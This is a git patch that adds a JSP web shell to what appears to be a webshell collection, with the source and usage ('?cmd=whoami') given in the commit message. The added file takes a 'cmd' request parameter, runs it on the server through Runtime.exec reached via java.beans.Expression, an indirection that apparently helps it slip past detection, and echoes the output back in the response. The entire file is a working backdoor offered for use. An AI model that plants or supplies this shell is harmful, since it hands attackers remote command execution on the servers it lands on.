From c8016065399029a52dc36f573106b368746e1e46 Mon Sep 17 00:00:00 2001
From: tennc <670357+tennc@users.noreply.github.com>
Date: Sat, 3 Sep 2022 11:09:10 +0800
Subject: [PATCH] Create 2022-09-03-03.jsp

From: https://mp.weixin.qq.com/s/BlfQ0t9s0vpTZo6sndfteg
Author: naihe567
Usage: xxx.jsp?cmd=whoami
---
 jsp/2022-09-03-03.jsp | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 jsp/2022-09-03-03.jsp

diff --git a/jsp/2022-09-03-03.jsp b/jsp/2022-09-03-03.jsp
new file mode 100644
index 0000000..1f5847f
--- /dev/null
+++ b/jsp/2022-09-03-03.jsp
@@ -0,0 +1,17 @@
+<%@ page import="java.beans.Expression" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStream" %>
+<%@ page language="java" pageEncoding="UTF-8" %>
+<%
+  String cmd = request.getParameter("cmd");
+  Expression expr = new Expression(Runtime.getRuntime(), "exec", new Object[]{cmd});
+
+  Process process = (Process) expr.getValue();
+  InputStream in = process.getInputStream();
+  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(in));
+  String tmp = null;
+  while((tmp = bufferedReader.readLine())!=null){
+    response.getWriter().println(tmp);
+  }
+%>